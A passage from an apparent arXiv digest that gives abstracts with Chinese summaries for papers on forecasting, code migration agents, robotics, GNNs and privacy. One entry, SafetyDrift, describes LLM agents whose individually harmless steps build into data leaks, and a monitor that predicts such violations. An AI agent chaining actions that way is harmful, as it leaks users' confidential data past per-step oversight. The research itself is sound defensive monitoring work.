Abstract:Forecasting multivariate time series remains challenging due to complex cross-variable dependencies and the presence of heterogeneous external influences. This paper presents Spectrogram-Enhanced Multimodal Fusion (SEMF), which combines spectral and temporal representations for more accurate and robust forecasting. The target time series is transformed into Morlet wavelet spectrograms, from which a Vision Transformer encoder extracts localized, frequency-aware features. In parallel, exogenous variables, such as financial indicators and macroeconomic signals, are encoded via a Transformer to capture temporal dependencies and multivariate dynamics. A bidirectional cross-attention module integrates these modalities into a unified representation that preserves distinct signal characteristics while modeling cross-modal correlations. Applied to multiple commodity price forecasting tasks, SEMF achieves consistent improvements over seven competitive baselines across multiple forecasting horizons and evaluation metrics. These results demonstrate the effectiveness of multimodal fusion and spectrogram-based encoding in capturing multi-scale patterns within complex financial time series.
[AI-107] A Multi-agent AI System for Deep Learning Model Migration from TensorFlow to JAX
【速读】:该论文旨在解决大规模深度学习模型从TensorFlow框架向JAX框架迁移过程中,因代码复杂性和人工维护成本高而导致的效率低下问题。解决方案的关键在于构建一个基于AI的多智能体系统,其中包含一个结合静态分析与AI指令的规划器(AI planner),通过生成式示例驱动的剧本(example-based playbooks)协调编译器(coders)和调度器(orchestrator)执行可靠迁移;同时引入基于AI的质量评估机制(AI-based judges)以在缺乏测试用例的情况下确保代码符合严格的风格与依赖要求,从而实现6.4–8倍的速度提升,并形成AI自我优化的良性循环。
链接: https://arxiv.org/abs/2603.27296
作者: Stoyan Nikolov,Bernhard Konrad,Moritz Gronbach,Niket Kumar,Ann Yan,Varun Singh,Yaning Liang,Parthasarathy Ranganathan
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:The rapid development of AI-based products and their underlying models has led to constant innovation in deep learning frameworks. Google has been pioneering machine learning usage across dozens of products. Maintaining the multitude of model source codes in different ML frameworks and versions is a significant challenge. So far the maintenance and migration work was done largely manually by human experts. We describe an AI-based multi-agent system that we built to support automatic migration of TensorFlow-based deep learning models into JAX-based ones. We make three main contributions: First, we show how an AI planner that uses a mix of static analysis with AI instructions can create migration plans for very complex code components that are reliably followed by the combination of an orchestrator and coders, using AI-generated example-based playbooks. Second, we define quality metrics and AI-based judges that accelerate development when the code to evaluate has no tests and has to adhere to strict style and dependency requirements. Third, we demonstrate how the system accelerates code migrations in a large hyperscaler environment on commercial real-world use-cases. Our approach dramatically reduces the time (6.4x-8x speedup) for deep learning model migrations and creates a virtuous circle where effectively AI supports its own development workflow. We expect that the techniques and approaches described here can be generalized for other framework migrations and general code transformation tasks.
[AI-108] Codebase-Memory: Tree-Sitter-Based Knowledge Graphs for LLM Code Exploration via MCP
【速读】:该论文旨在解决大型语言模型(Large Language Model, LLM)在代码库中进行代码探索时效率低下、缺乏结构理解的问题,传统方法依赖重复的文件读取和grep搜索,导致每查询消耗数千token且无法有效建模代码间的语义关系。其解决方案的关键在于提出Codebase-Memory系统,该系统基于Tree-Sitter构建持久化的知识图谱,通过模型上下文协议(Model Context Protocol, MCP)实现多阶段解析流程,包括并行工作池、调用图遍历、影响分析与社区发现,从而以极低的token消耗(仅为原方法的十分之一)和工具调用次数(减少2.1倍)显著提升代码理解的结构性与效率,在31个真实项目中达到83%的答案质量,并在图原生查询(如枢纽节点检测与调用者排序)中表现优于或等同于文件探索型代理。
链接: https://arxiv.org/abs/2603.27277
作者: Martin Vogel,Falk Meyer-Eschenbach,Severin Kohler,Elias Grünewald,Felix Balzer
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI); Programming Languages (cs.PL)
备注: 10 pages, 5 authors, preprint
Abstract:Large Language Model (LLM) coding agents typically explore codebases through repeated file-reading and grep-searching, consuming thousands of tokens per query without structural understanding. We present Codebase-Memory, an open-source system that constructs a persistent, Tree-Sitter-based knowledge graph via the Model Context Protocol (MCP), parsing 66 languages through a multi-phase pipeline with parallel worker pools, call-graph traversal, impact analysis, and community discovery. Evaluated across 31 real-world repositories, Codebase-Memory achieves 83% answer quality versus 92% for a file-exploration agent, at ten times fewer tokens and 2.1 times fewer tool calls. For graph-native queries such as hub detection and caller ranking, it matches or exceeds the explorer on 19 of 31 languages.
[AI-109] Robust Global-Local Behavior Arbitration via Continuous Command Fusion Under LiDAR Errors
【速读】:该论文旨在解决模块化自动驾驶系统在感知不完善和严格实时约束下,如何协调全局路径跟踪目标与局部安全反应的问题。其关键解决方案是提出一个基于ROS2原生的仲裁模块,该模块持续融合两个不变且可解释的控制器输出:基于Pure Pursuit的全局参考轨迹跟踪控制器和基于LiDAR的反应式Gap Follow控制器;在每个控制周期中,两控制器分别生成Ackermann指令,由一个通过PPO训练的策略网络根据紧凑特征观测预测连续门控值,从而生成单一融合驱动命令,并辅以实用的安全检查机制,实现对不同感知质量下的鲁棒性控制决策。
链接: https://arxiv.org/abs/2603.27273
作者: Mohamed Elgouhary,Amr S. El-Wakeel
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Systems and Control (eess.SY)
备注:
Abstract:Modular autonomous driving systems must coordinate global progress objectives with local safety-driven reactions under imperfect sensing and strict real-time constraints. This paper presents a ROS2-native arbitration module that continuously fuses the outputs of two unchanged and interpretable controllers: a global reference-tracking controller based on Pure Pursuit and a reactive LiDAR-based Gap Follow controller. At each control step, both controllers propose Ackermann commands, and a PPO-trained policy predicts a continuous gate from a compact feature observation to produce a single fused drive command, augmented with practical safety checks. For comparison under identical ROS topic inputs and control rate, we implement a lightweight sampling-based predictive baseline. Robustness is evaluated using a ROS2 impairment protocol that injects LiDAR noise, delay, and dropout, and additionally sweeps forward-cone false short-range outliers. In a repeatable close-proximity passing scenario, we report safe success and failure rates together with per-step end-to-end controller runtime as sensing stress increases. The study is intended as a command-level robustness evaluation in a modular ROS2 setting, not as a replacement for planning-level interaction reasoning.
[AI-110] Quantification of Credal Uncertainty: A Distance-Based Approach
【速读】:该论文旨在解决如何在多分类场景中对可信集(credal sets)中的总不确定性(total uncertainty)、随机不确定性(aleatoric uncertainty)和认知不确定性(epistemic uncertainty)进行量化的问题,这一问题在现有研究中尚未得到充分探讨。解决方案的关键在于提出一种基于距离的度量框架,利用积分概率度量(Integral Probability Metrics, IPMs)定义一组具有明确语义解释的不确定性测度,该框架满足自然的理论性质且对常见IPM选择保持计算可 tractable(可计算性)。作者以总变差距离(total variation distance)为例进行实例化,在二分类情况下恢复了已有的不确定性度量,并首次实现了其向多分类场景的合理推广,实验表明该方法在低计算成本下表现出良好的实用性。
链接: https://arxiv.org/abs/2603.27270
作者: Xabier Gonzalez-Garcia,Siu Lun Chau,Julian Rodemann,Michele Caprio,Krikamol Muandet,Humberto Bustince,Sébastien Destercke,Eyke Hüllermeier,Yusuf Sale
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注:
Abstract:Credal sets, i.e., closed convex sets of probability measures, provide a natural framework to represent aleatoric and epistemic uncertainty in machine learning. Yet how to quantify these two types of uncertainty for a given credal set, particularly in multiclass classification, remains underexplored. In this paper, we propose a distance-based approach to quantify total, aleatoric, and epistemic uncertainty for credal sets. Concretely, we introduce a family of such measures within the framework of Integral Probability Metrics (IPMs). The resulting quantities admit clear semantic interpretations, satisfy natural theoretical desiderata, and remain computationally tractable for common choices of IPMs. We instantiate the framework with the total variation distance and obtain simple, efficient uncertainty measures for multiclass classification. In the binary case, this choice recovers established uncertainty measures, for which a principled multiclass generalization has so far been missing. Empirical results confirm practical usefulness, with favorable performance at low computational cost.
[AI-111] Amalgam: Hybrid LLM -PGM Synthesis Algorithm for Accuracy and Realism
【速读】:该论文旨在解决生成式人工智能(Generative AI)在合成数据生成中面临的两难问题:传统概率图模型(Probabilistic Graphical Models, PGMs)虽能支持高级分析但难以处理复杂模式,而大型语言模型(Large Language Models, LLMs)虽可建模复杂结构却导致数据分布偏斜,削弱了其用于高级分析的有效性。解决方案的关键在于提出一种混合算法 Amalgam,融合 LLM 的结构表达能力与 PGM 的统计保真特性,从而在保持数据真实度(realism)的同时确保统计合理性与隐私保障,实验表明其平均 χ² p 值达 91%,真实度评分 3.8/5,显著优于现有方法(3.3/5)。
链接: https://arxiv.org/abs/2603.27254
作者: Antheas Kapenekakis,Bent Thomsen,Katja Hose,Michele Albano
机构: 未知
类目: Databases (cs.DB); Artificial Intelligence (cs.AI)
备注:
Abstract:To generate synthetic datasets, e.g., in domains such as healthcare, the literature proposes approaches of two main types: Probabilistic Graphical Models (PGMs) and Deep Learning models, such as LLMs. While PGMs produce synthetic data that can be used for advanced analytics, they do not support complex schemas and datasets. LLMs on the other hand, support complex schemas but produce skewed dataset distributions, which are less useful for advanced analytics. In this paper, we therefore present Amalgam, a hybrid LLM-PGM data synthesis algorithm supporting both advanced analytics, realism, and tangible privacy properties. We show that Amalgam synthesizes data with an average 91 % \chi^2 P value and scores 3.8/5 for realism using our proposed metric, where state-of-the-art is 3.3 and real data is 4.7.
[AI-112] Can pre-trained Deep Learning models predict groove ratings?
【速读】:该论文旨在解决如何利用深度学习模型从音频信号中直接预测“律动”(groove)及其相关感知维度的问题,特别是相较于传统手工设计的声学特征,能否更有效地捕捉到风格依赖的复杂律动特性。其解决方案的关键在于使用七种先进的深度学习模型提取音频嵌入(audio embeddings),并对比这些表示与传统特征在预测律动感评分和相关感知响应上的表现;进一步通过源分离技术分析各乐器成分对律动预测的独立贡献,从而揭示不同音乐风格(放克、流行和摇滚)下律动特性的差异化编码机制。研究结果表明,深度音频表示能够有效建模风格相关的律动成分,显著优于传统特征,凸显了表征学习在音乐信息检索(Music Information Retrieval, MIR)中的强大潜力。
链接: https://arxiv.org/abs/2603.27237
作者: Axel Marmoret,Nicolas Farrugia,Jan Alexander Stupacher
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Audio and Speech Processing (eess.AS)
备注: Submitted to the SMC 2026 conference. 3 figures and 2 tables
Abstract:This study explores the extent to which deep learning models can predict groove and its related perceptual dimensions directly from audio signals. We critically examine the effectiveness of seven state-of-the-art deep learning models in predicting groove ratings and responses to groove-related queries through the extraction of audio embeddings. Additionally, we compare these predictions with traditional handcrafted audio features. To better understand the underlying mechanics, we extend this methodology to analyze predictions based on source-separated instruments, thereby isolating the contributions of individual musical elements. Our analysis reveals a clear separation of groove characteristics driven by the underlying musical style of the tracks (funk, pop, and rock). These findings indicate that deep audio representations can successfully encode complex, style-dependent groove components that traditional features often miss. Ultimately, this work highlights the capacity of advanced deep learning models to capture the multifaceted concept of groove, demonstrating the strong potential of representation learning to advance predictive Music Information Retrieval methodologies.
[AI-113] Unsupervised Evaluation of Deep Audio Embeddings for Music Structure Analysis
【速读】:该论文旨在解决音乐结构分析(Music Structure Analysis, MSA)中依赖大量标注数据的瓶颈问题,以及现有方法在处理结构性歧义时的局限性。其关键解决方案是采用无监督评估框架,对九种开源通用预训练深度音频模型进行测试,通过提取节拍级嵌入(barwise embeddings)并结合三种无监督分割算法(Foote’s checkerboard kernels、谱聚类和相关块匹配法 Correlation Block-Matching, CBM),仅聚焦于边界检测任务。结果表明,现代通用深度嵌入优于传统基于频谱图的基线方法,且CBM算法在下游分割任务中表现最稳定有效,同时提出“裁剪”(trimming)甚至“双重裁剪”(double trimming)以提升评估标准的严谨性。
链接: https://arxiv.org/abs/2603.27218
作者: Axel Marmoret
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Submitted to the SMC 2026 conference. 2 figures and 2 tables in the main document, 7 figures in Appendix
Abstract:Music Structure Analysis (MSA) aims to uncover the high-level organization of musical pieces. State-of-the-art methods are often based on supervised deep learning, but these methods are bottlenecked by the need for heavily annotated data and inherent structural ambiguities. In this paper, we propose an unsupervised evaluation of nine open-source, generic pre-trained deep audio models, on MSA. For each model, we extract barwise embeddings and segment them using three unsupervised segmentation algorithms (Foote’s checkerboard kernels, spectral clustering, and Correlation Block-Matching (CBM)), focusing exclusively on boundary retrieval. Our results demonstrate that modern, generic deep embeddings generally outperform traditional spectrogram-based baselines, but not systematically. Furthermore, our unsupervised boundary estimation methodology generally yields stronger performance than recent linear probing baselines. Among the evaluated techniques, the CBM algorithm consistently emerges as the most effective downstream segmentation method. Finally, we highlight the artificial inflation of standard evaluation metrics and advocate for the systematic adoption of trimming'', or even double trimming’’ annotations to establish more rigorous MSA evaluation standards.
[AI-114] AutoMS: Multi-Agent Evolutionary Search for Cross-Physics Inverse Microstructure Design
【速读】:该论文旨在解决材料科学中微结构逆向设计的难题,即如何在复杂的多物理场耦合目标下高效搜索满足物理约束的可行解。传统拓扑优化方法因计算成本过高而难以应用,而深度生成模型常出现“物理幻觉”(physical hallucinations),无法保证结果的物理有效性。其解决方案的关键在于提出一种多智能体神经符号框架AutoMS,通过大语言模型(LLM)作为“语义导航器”初始化搜索空间并跳出局部最优,并结合创新的仿真感知进化搜索(Simulation-Aware Evolutionary Search, SAES)机制,利用仿真反馈进行局部梯度近似和定向参数更新,从而引导搜索过程逼近物理有效的帕累托前沿。该架构由管理、解析、生成与仿真四个专用智能体协同工作,在17个跨物理任务上实现83.8%的成功率,显著优于NSGA-II(43.7%)和基于ReAct的LLM基线(53.3%)。
链接: https://arxiv.org/abs/2603.27195
作者: Zhenyuan Zhao,Yu Xing,Tianyang Xue,Lingxin Cao,Xin Yan,Lin Lu
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Designing microstructures that satisfy coupled cross-physics objectives is a fundamental challenge in material science. This inverse design problem involves a vast, discontinuous search space where traditional topology optimization is computationally prohibitive, and deep generative models often suffer from “physical hallucinations,” lacking the capability to ensure rigorous validity. To address this limitation, we introduce AutoMS, a multi-agent neuro-symbolic framework that reformulates inverse design as an LLM-driven evolutionary search. Unlike methods that treat LLMs merely as interfaces, AutoMS integrates them as “semantic navigators” to initialize search spaces and break local optima, while our novel Simulation-Aware Evolutionary Search (SAES) addresses the “blindness” of traditional evolutionary strategies. Specifically, SAES utilizes simulation feedback to perform local gradient approximation and directed parameter updates, effectively guiding the search toward physically valid Pareto frontiers. Orchestrating specialized agents (Manager, Parser, Generator, and Simulator), AutoMS achieves a state-of-the-art 83.8% success rate on 17 diverse cross-physics tasks, nearly doubling the performance of traditional NSGA-II (43.7%) and significantly outperforming ReAct-based LLM baselines (53.3%). Furthermore, our hierarchical architecture reduces total execution time by 23.3%. AutoMS demonstrates that autonomous agent systems can effectively navigate complex physical landscapes, bridging the gap between semantic design intent and rigorous physical validity.
[AI-115] Multi-AUV Ad-hoc Networks-Based Multi-Target Tracking Based on Scene-Adaptive Embodied Intelligence
【速读】:该论文旨在解决多自主水下航行器(AUV)自组织网络在高度动态拓扑变化和严重受限声学通信带宽条件下,传统以数据为中心的架构难以维持操作一致性的问题。解决方案的关键在于提出一种场景自适应具身智能(Scene-Adaptive Embodied Intelligence, EI)架构,将AUV重构为集成感知、决策与物理执行的统一认知闭环,并设计基于信标(beacon-based)的通信与控制模型,将通信链路视为约束感知的动态通道,从而有效衔接高层策略推理与分布式物理执行;同时引入具有双路径评论家机制的场景自适应多智能体强化学习(Scene-Adaptive Multi-Agent Reinforcement Learning, SA-MARL)算法,通过权重驱动的动态融合过程整合场景评论家网络与通用评论家网络,实现特定追踪任务与全局安全约束的有效解耦,促进策略的自主演化。
链接: https://arxiv.org/abs/2603.27194
作者: Kai Tian,Jialun Wang,Chuan Lin,Guangjie Han,Shengchao Zhu,Ying Liu,Qian Zhu
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:With the rapid advancement of underwater net-working and multi-agent coordination technologies, autonomous underwater vehicle (AUV) ad-hoc networks have emerged as a pivotal framework for executing complex maritime missions, such as multi-target tracking. However, traditional data-centricarchitectures struggle to maintain operational consistency under highly dynamic topological fluctuations and severely constrained acoustic communication bandwidth. This article proposes a scene-adaptive embodied intelligence (EI) architecture for multi-AUV ad-hoc networks, which re-envisions AUVs as embodied entities by integrating perception, decision-making, and physical execution into a unified cognitive loop. To materialize the functional interaction between these layers, we define a beacon-based communication and control model that treats the communication link as a dynamic constraint-aware channel, effectively bridging the gap between high-level policy inference and decentralized physical actuation. Specifically, the proposed architecture employs a three-layer functional framework and introduces a Scene-Adaptive MARL (SA-MARL) algorithm featuring a dual-path critic mechanism. By integrating a scene critic network and a general critic network through a weight-based dynamic fusion process, SA-MARL effectively decouples specialized tracking tasks from global safety constraints, facilitating autonomous policy evolution. Evaluation results demonstrate that the proposedscheme significantly accelerates policy convergence and achieves superior tracking accuracy compared to mainstream MARL approaches, maintaining robust performance even under intense environmental interference and fluid topological shifts.
[AI-116] An End-to-end Flight Control Network for High-speed UAV Obstacle Avoidance based on Event-Depth Fusion
【速读】:该论文旨在解决复杂环境中高速自主飞行的障碍物避让难题,尤其针对静态、动态或混合障碍物场景下单一感知模态信息不完整的问题。现有深度相机在高速运动时易受运动模糊影响,而事件相机虽擅长捕捉快速运动却难以感知静态场景,导致传统方法在动态与静态环境协同感知中表现受限。解决方案的关键在于提出一种端到端的飞行控制网络,通过双向交叉注意力(bidirectional cross-attention)模块实现深度图像与事件数据的特征级融合,从而有效整合两种传感器的互补优势;同时设计基于球面主搜索(Spherical Principal Search, SPS)的高效专家规划器,在保持轨迹平滑性的同时将计算复杂度从O(n²)降低至O(n),显著提升高鲁棒性避障性能,在17 m/s速度下成功率达80%以上,优于单模态及单向融合模型10–20%。
链接: https://arxiv.org/abs/2603.27181
作者: Dikai Shang,Jingyue Zhao,Shi Xu,Nanyang Ye,Lei Wang
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注: 7 pages, 10 figures
Abstract:Achieving safe, high-speed autonomous flight in complex environments with static, dynamic, or mixed obstacles remains challenging, as a single perception modality is incomplete. Depth cameras are effective for static objects but suffer from motion blur at high speeds. Conversely, event cameras excel at capturing rapid motion but struggle to perceive static scenes. To exploit the complementary strengths of both sensors, we propose an end-to-end flight control network that achieves feature-level fusion of depth images and event data through a bidirectional crossattention module. The end-to-end network is trained via imitation learning, which relies on high-quality supervision. Building on this insight, we design an efficient expert planner using Spherical Principal Search (SPS). This planner reduces computational complexity from O(n^2) to O(n) while generating smoother trajectories, achieving over 80% success rate at 17m/s–nearly 20% higher than traditional planners. Simulation experiments show that our method attains a 70-80% success rate at 17 m/s across varied scenes, surpassing single-modality and unidirectional fusion models by 10-20%. These results demonstrate that bidirectional fusion effectively integrates event and depth information, enabling more reliable obstacle avoidance in complex environments with both static and dynamic objects.
[AI-117] Aligning LLM s with Graph Neural Solvers for Combinatorial Optimization
【速读】:该论文旨在解决纯语言模型在求解组合优化问题(Combinatorial Optimization Problems, COPs)时难以准确捕捉复杂关系结构的问题,尤其是在中等规模及以上实例上表现不佳。其解决方案的关键在于提出AlignOPT方法,通过将大语言模型(Large Language Models, LLMs)与图神经网络求解器(Graph Neural Solvers)对齐,实现语义理解与结构建模的协同融合:LLMs负责编码COP任务及实例的自然语言描述,图神经网络则显式建模实例的底层图结构,从而构建更具泛化能力的神经启发式算法。实验表明,该方法在多种COP任务上达到最优性能,并展现出良好的未见实例扩展能力。
链接: https://arxiv.org/abs/2603.27169
作者: Shaodi Feng,Zhuoyi Lin,Yaoxin Wu,Haiyan Yin,Yan Jin,Senthilnath Jayavelu,Xun Xu
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 18 pages, 3 figures
Abstract:Recent research has demonstrated the effectiveness of large language models (LLMs) in solving combinatorial optimization problems (COPs) by representing tasks and instances in natural language. However, purely language-based approaches struggle to accurately capture complex relational structures inherent in many COPs, rendering them less effective at addressing medium-sized or larger instances. To address these limitations, we propose AlignOPT, a novel approach that aligns LLMs with graph neural solvers to learn a more generalizable neural COP heuristic. Specifically, AlignOPT leverages the semantic understanding capabilities of LLMs to encode textual descriptions of COPs and their instances, while concurrently exploiting graph neural solvers to explicitly model the underlying graph structures of COP instances. Our approach facilitates a robust integration and alignment between linguistic semantics and structural representations, enabling more accurate and scalable COP solutions. Experimental results demonstrate that AlignOPT achieves state-of-the-art results across diverse COPs, underscoring its effectiveness in aligning semantic and structural representations. In particular, AlignOPT demonstrates strong generalization, effectively extending to previously unseen COP instances.
[AI-118] GSR-GNN: Training Acceleration and Memory-Saving Framework of Deep GNNs on Circuit Graph
【速读】:该论文旨在解决图神经网络(Graph Neural Networks, GNNs)在现代大规模电路图分析中因GPU内存限制和训练成本过高而难以扩展的问题,尤其是在深度模型场景下。其解决方案的关键在于提出一种名为分组稀疏可逆图神经网络(Grouped-Sparse-Reversible GNN, GSR-GNN)的新架构:通过引入可逆残差模块与分组稀疏非线性算子,在压缩节点嵌入的同时保留任务相关特征,并结合优化的执行流水线消除碎片化激活存储、减少数据移动,从而实现高达87.2%的峰值内存降低和30倍以上的训练速度提升,同时保持相关性指标几乎无损,使深层GNN在大规模电子设计自动化(EDA)任务中具备实际可行性。
链接: https://arxiv.org/abs/2603.27156
作者: Yuebo Luo,Shiyang Li,Yifei Feng,Vishal Kancharla,Shaoyi Huang,Caiwen Ding
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 8 pages including references, already been accepted to DAC 2026
Abstract:Graph Neural Networks (GNNs) show strong promise for circuit analysis, but scaling to modern large-scale circuit graphs is limited by GPU memory and training cost, especially for deep models. We revisit deep GNNs for circuit graphs and show that, when trainable, they significantly outperform shallow architectures, motivating an efficient, domain-specific training framework. We propose Grouped-Sparse-Reversible GNN (GSR-GNN), which enables training GNNs with up to hundreds of layers while reducing both compute and memory overhead. GSR-GNN integrates reversible residual modules with a group-wise sparse nonlinear operator that compresses node embeddings without sacrificing task-relevant information, and employs an optimized execution pipeline to eliminate fragmented activation storage and reduce data movement. On sampled circuit graphs, GSR-GNN achieves up to 87.2% peak memory reduction and over 30 \times training speedup with negligible degradation in correlation-based quality metrics, making deep GNNs practical for large-scale EDA workloads.
[AI-119] A Tight Expressivity Hierarchy for GNN-Based Entity Resolution in Master Data Management
【速读】:该论文旨在解决实体解析(Entity Resolution)中如何根据匹配准则选择最简且理论有效的消息传递神经网络(MPNN)架构的问题。其核心挑战在于不同实体解析任务具有本质不同的复杂度,而现有通用MPNN结构(如包含反向消息传递、端口编号和自体ID等扩展)往往引入不必要的计算开销。解决方案的关键在于提出一套基于类型化实体-属性图的四定理分离理论:通过定义共指谓词 Dupr(两个同类型实体至少共享 r 个属性值)和 ℓ-环谓词 Cycℓ(存在实体间边的场景),证明了每类谓词所需的最小MPNN深度与结构特征——检测单个共享属性仅需两层反向消息传递即可完成(纯局部性),而检测多个共享属性则必须引入跨属性身份关联(非局部性),这要求使用自体ID并至少四层才能实现,即使在无环二分图上亦然;类似结论也适用于环检测。由此确立了“最小架构原则”,即实践者可依据任务需求选取成本最低但理论上完备的MPNN适应集,且保证不存在更简单的替代方案。
链接: https://arxiv.org/abs/2603.27154
作者: Ashwin Ganesan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Data Structures and Algorithms (cs.DS)
备注:
Abstract:Entity resolution – identifying database records that refer to the same real-world entity – is naturally modelled on bipartite graphs connecting entity nodes to their attribute values. Applying a message-passing neural network (MPNN) with all available extensions (reverse message passing, port numbering, ego IDs) incurs unnecessary overhead, since different entity resolution tasks have fundamentally different complexity. For a given matching criterion, what is the cheapest MPNN architecture that provably works? We answer this with a four-theorem separation theory on typed entity-attribute graphs. We introduce co-reference predicates \mathrmDup_r (two same-type entities share at least r attribute values) and the \ell -cycle predicate \mathrmCyc_\ell for settings with entity-entity edges. For each predicate we prove tight bounds – constructing graph pairs provably indistinguishable by every MPNN lacking the required adaptation, and exhibiting explicit minimal-depth MPNNs that compute the predicate on all inputs. The central finding is a sharp complexity gap between detecting any shared attribute and detecting multiple shared attributes. The former is purely local, requiring only reverse message passing in two layers. The latter demands cross-attribute identity correlation – verifying that the same entity appears at several attributes of the target – a fundamentally non-local requirement needing ego IDs and four layers, even on acyclic bipartite graphs. A similar necessity holds for cycle detection. Together, these results yield a minimal-architecture principle: practitioners can select the cheapest sufficient adaptation set, with a guarantee that no simpler architecture works. Computational validation confirms every prediction. Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Data Structures and Algorithms (cs.DS) ACMclasses: I.2.6; H.2.8; F.2 Cite as: arXiv:2603.27154 [cs.LG] (or arXiv:2603.27154v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27154 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-120] SafetyDrift: Predicting When AI Agents Cross the Line Before They Actually Do
【速读】:该论文旨在解决生成式 AI(Generative AI)代理在执行看似安全的单步操作时,因行为序列累积导致的数据泄露问题,即“安全漂移”(safety drift)。其核心挑战在于:虽然每一步单独来看均不违反安全规则,但多步骤组合可能引发不可逆的安全违规。解决方案的关键在于将代理的安全轨迹建模为吸收马尔可夫链(absorbing Markov chains),通过闭式吸收分析计算在有限步数内达到违规状态的概率,从而实现对“不可逆点”(points of no return)的精准预测。该方法揭示了任务类型对安全风险演化路径的显著影响,并基于此构建轻量级监控器,在极低计算开销下实现了高精度、提前预警的违规检测,显著优于传统关键词匹配和逐步大语言模型(LLM)判断方法。
链接: https://arxiv.org/abs/2603.27148
作者: Aditya Dhodapkar,Farhaan Pishori
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
备注: 9 pages, 7 figures, sent to COLM conference
Abstract:When an LLM agent reads a confidential file, then writes a summary, then emails it externally, no single step is unsafe, but the sequence is a data leak. We call this safety drift: individually safe actions compounding into violations. Prior work has measured this problem; we predict it. SafetyDrift models agent safety trajectories as absorbing Markov chains, computing the probability that a trajectory will reach a violation within a given number of steps via closed form absorption analysis. A consequence of the monotonic state design is that every agent will eventually violate safety if left unsupervised (absorption probability 1.0 from all states), making the practical question not if but when, and motivating our focus on finite horizon prediction. Across 357 traces spanning 40 realistic tasks in four categories, we discover that “points of no return” are sharply task dependent: in communication tasks, agents that reach even a mild risk state have an 85% chance of violating safety within five steps, while in technical tasks the probability stays below 5% from any state. A lightweight monitor built on these models detects 94.7% of violations with 3.7 steps of advance warning at negligible computational cost, outperforming both keyword matching (44.7% detection, 55.9% false positive rate) and per step LLM judges (52.6% detection, 38.2% false positive rate) while running over 60,000x faster.
[AI-121] Bayesian-Symbolic Integration for Uncertainty-Aware Parking Prediction ITSC2025
【速读】:该论文旨在解决智能交通系统中停车可用性预测面临的现实挑战,包括数据稀疏性、噪声干扰及不可预测的环境变化,这些问题导致传统模型在实际部署中鲁棒性不足。解决方案的关键在于提出一种松耦合的神经符号框架,将贝叶斯神经网络(Bayesian Neural Networks, BNNs)与符号推理相结合:BNNs用于量化预测不确定性,而通过决策树提取的符号知识以概率逻辑编程形式编码,并采用两种混合策略——一是当BNN置信度低时启用符号推理作为备选方案,二是基于符号约束对输出类别进行上下文精炼后再重新应用BNN。实验表明,该方法在全量、稀疏和噪声条件下均优于纯符号推理及LSTM和BNN基线模型,凸显了模块化神经符号集成在不确定性环境中的潜力。
链接: https://arxiv.org/abs/2603.27119
作者: Alireza Nezhadettehad,Arkady Zaslavsky,Abdur Rakib,Seng W. Loke
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: Accepted at IEEE ITSC 2025 (to appear)
Abstract:Accurate parking availability prediction is critical for intelligent transportation systems, but real-world deployments often face data sparsity, noise, and unpredictable changes. Addressing these challenges requires models that are not only accurate but also uncertainty-aware. In this work, we propose a loosely coupled neuro-symbolic framework that integrates Bayesian Neural Networks (BNNs) with symbolic reasoning to enhance robustness in uncertain environments. BNNs quantify predictive uncertainty, while symbolic knowledge extracted via decision trees and encoded using probabilistic logic programming is leveraged in two hybrid strategies: (1) using symbolic reasoning as a fallback when BNN confidence is low, and (2) refining output classes based on symbolic constraints before reapplying the BNN. We evaluate both strategies on real-world parking data under full, sparse, and noisy conditions. Results demonstrate that both hybrid methods outperform symbolic reasoning alone, and the context-refinement strategy consistently exceeds the performance of Long Short-Term Memory (LSTM) networks and BNN baselines across all prediction windows. Our findings highlight the potential of modular neuro-symbolic integration in real-world, uncertainty-prone prediction tasks.
[AI-122] Gender-Based Heterogeneity in Youth Privacy-Protective Behavior for Smart Voice Assistants: Evidence from Multigroup PLS-SEM CEC
【速读】:该论文旨在解决性别如何影响青少年在智能语音助手(Smart Voice Assistant, SVA)生态系统中的隐私决策问题。其核心贡献在于通过多群组偏最小二乘结构方程模型(Multigroup Partial Least Squares Structural Equation Modeling)对469名加拿大16-24岁青年的数据进行分析,揭示了性别在五个隐私构念(感知隐私风险、感知隐私收益、算法透明度与信任、隐私自我效能感、隐私保护行为)之间路径上的异质性:男性更受感知隐私风险直接影响隐私保护行为,而女性则更多通过算法透明度与信任提升隐私自我效能感进而促进隐私保护行为。这一发现表明,性别可能调节关键隐私决策路径,为设计更具响应性的透明度和控制干预措施提供了实证依据。
链接: https://arxiv.org/abs/2603.27117
作者: Molly Campbell,Yulia Bobkova,Ajay Kumar Shrestha
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注: To appear in IEEE CCECE 2026 proceedings
